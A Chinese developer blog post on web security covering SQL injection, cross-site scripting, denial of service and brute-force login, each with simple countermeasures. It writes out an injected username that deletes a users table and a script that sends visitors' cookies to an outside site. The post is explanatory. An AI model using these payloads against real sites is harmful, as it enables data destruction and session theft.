`
qiyueguxing
  • 浏览: 66426 次
  • 性别: Icon_minigender_1
  • 来自: 南京
社区版块
存档分类
最新评论

web安全考虑

    博客分类:
  • web
阅读更多

在平时的编程中,我们常常会忽略一些重要的安全隐患,今天整理如下:

 

  1.SQL注入攻击
  服务器端程序有时希望接受客户端输入并且将他作为查询的一部分
  例如:一个接收用户名的登录界面可能执行以下代码:

 sql=select * from users where username=?

 
   如果客户端输入以下字符串作为用户名
 

 a';delete from users;

 

 sql=select * from users where username=a';delete from users;

 
   如果这条语句被执行,那么users表中的数据就会被删除
  
  对策:
    1.禁止输入特殊字符,如百分号,单引号,双引号
    2.禁止输入敏感字符,如update,insert,delete
    3.对特殊字符进行转义


  2、跨站脚本攻击
    假设有个留言板,你输入如下文字:
   

<script>
     document.location="http://myside.com/xx.jsp?cookies="+document.cookie
</script>

 
   这相当于在留言板网站的源程序中加入了JavaScript代码。
   当其他客户查看这条留言的时候,浏览器就会在后台把这个客户端浏览器的cookie发送到myside.com网站。
   这个网站只要设置接收程序就可以通过cookies变量获得该客户的cookies信息
   如果上述文字从数据库中取出来的,也会有同样的结果


   对策:
      1.在界面输入中,禁止输入脚本
      2.在把数据存入数据库之前,以及从数据库取出数据后,进行html转义
     

 

 3.拒绝攻击
    1.上传非常大的数据或文件可以很快地填满数据库
    2.短时间内上传大量数据或文件也可以填满数据库,使系统无法运转。
    攻击者可以在短时间内用大量的下载访问请求来堵塞服务器,使之没有空闲处理合法客户的请求。
  
 4.暴力攻击
      假设一个登录页面。攻击者可以编写代码,简单地加入一个循环来尝试用不同的用户名/密码登录,获得合法客户身份
  

分享到:
评论

相关推荐

    信息安全技术Web应用安全检测系统安全技术要求和测试评价方法.pdf

    黑盒测试是指对Web应用程序的安全检测不考虑其内部结构和实现细节,而白盒测试是指对Web应用程序的安全检测需要考虑其内部结构和实现细节。灰盒测试是指对Web应用程序的安全检测既考虑其内部结构和实现细节,又考虑...

    白帽子讲Web安全.pdf (文字版)

    - **重要性**:强调在整个软件开发生命周期中嵌入安全考虑,包括需求分析、设计、编码、测试和部署阶段的安全实践。 - **具体做法**:采用安全编码标准、进行代码审查、实施自动化安全测试工具等。 5. **安全运维...

    白帽子讲Web安全完整版

    《白帽子讲Web安全》是一本深入探讨网络安全,特别是Web应用程序安全的专业书籍。"白帽子"一词在网络安全领域通常指的是那些通过合法手段发现并报告系统漏洞的安全专家,与"黑帽子"黑客形成鲜明对比。这本书是他们...

    Web安全测试规范

    Web安全测试规范是针对Web应用程序进行安全性检测的一套详细指导原则,旨在确保Web应用在上线前能够有效防止各种网络安全威胁。本规范由安全解决方案部电信网络与业务安全实验室、软件公司安全TMG以及软件公司测试...

    WEB安全测试通常要考虑的测试点.txt

    ### WEB安全测试通常要考虑的关键测试点 在进行WEB安全测试时,我们需要关注多个关键领域,以确保系统的安全性。以下是对给定文件中的标题、描述、标签以及部分内容进行深入解析后得出的一些重要知识点。 #### 一...

    web安全深度剖析

    《Web安全深度剖析》这本书由张炳帅撰写,旨在深入探讨Web安全领域的核心技术和策略,为读者揭示网络攻防背后的原理与实践。本书通过全面解析Web应用的安全问题,提供了有效的检测和防御方案,帮助读者构建更为稳固...

    白帽子讲Web安全

    由于提供的文件信息中,【标题】与【描述】内容完全一致,且【部分内容】重复且未提供实际内容,我将从通用的web安全角度出发,结合标题“白帽子讲Web安全”,深入探讨一些关键知识点。 web安全是一个涵盖广泛的...

    web安全前端编码规范1

    一、项目设计阶段的安全考虑 在项目初始设计阶段,安全应被视为核心要素之一。这包括在需求分析和功能规划中考虑到安全因素,确保从一开始就建立安全意识。对于重要的项目,应当邀请Web安全小组参与设计审查,提供...

    安全开发之Java Web安全编码.pdf

    ### 安全开发之Java Web安全编码 #### 一、Web应用安全威胁 在现代互联网环境中,Web应用程序作为企业对外展示的重要窗口,面临着各种各样的安全威胁。这些威胁不仅包括了传统的技术层面的问题,还涉及到了更为...

    web安全测试pdf书

    《Web安全测试》这本书主要涵盖了Web应用程序的安全检测与防护方面的知识。在当今互联网时代,Web应用已经成为企业与用户交互的主要平台,因此确保其安全性至关重要。Web安全测试是防止数据泄露、保护用户隐私以及...

    WEB安全编程技术规范

    《WEB安全编程技术规范》旨在为Web应用开发提供一套全面而详细的指导原则,确保在软件生命周期的各个阶段都能考虑到安全因素,尤其适用于浙江省内各公司IT系统的项目开发,无论是内部团队还是外部供应商,都应遵循此...

    WEB安全测试pdf

    Web安全测试是信息技术领域中的一个重要分支,主要关注的是在Web应用程序中发现并修复安全漏洞的过程。随着互联网技术的快速发展,Web应用已经成为攻击者的主要目标,因此Web安全测试变得至关重要。以下是一些关于...

    Web服务器安全设置

    针对Web服务器的安全性,还需考虑其相关服务,如SMTP服务的安全配置。正确配置网络,例如设置邮件中继服务,可以阻止未经认证的邮件服务器直接与Exchange服务器通信,从而避免垃圾邮件和潜在的邮件炸弹攻击。 在...

    web安全--project.zip

    在IT领域,Web安全是一个至关重要的主题,它涵盖了保护Web应用程序和服务器免受恶意攻击的各种技术和策略。"web安全--project.zip"这个压缩包文件很可能包含了一组与Web安全相关的项目或学习材料,例如t1eexx可能是...

    web安全编程技术规范V1.0.pdf

    本次分享的主题是关于《web安全编程技术规范V1.0.pdf》文件的内容解析,文件涉及了web应用开发中的安全规范和技术要求,重点在于提供给浙江公司IT系统内部和厂商使用的WEB编码安全具体要求。规范详细阐述了在Java和...

    WEB系统安全开发和改造规范

    《WEB系统安全开发和改造规范...总的来说,有效的WEB安全开发和改造规范需要综合考虑风险评估、安全设计、加密技术、身份验证、访问控制以及持续的安全监测和维护。只有这样,才能构建一个既安全又高效的企业WEB环境。

Global site tag (gtag.js) - Google Analytics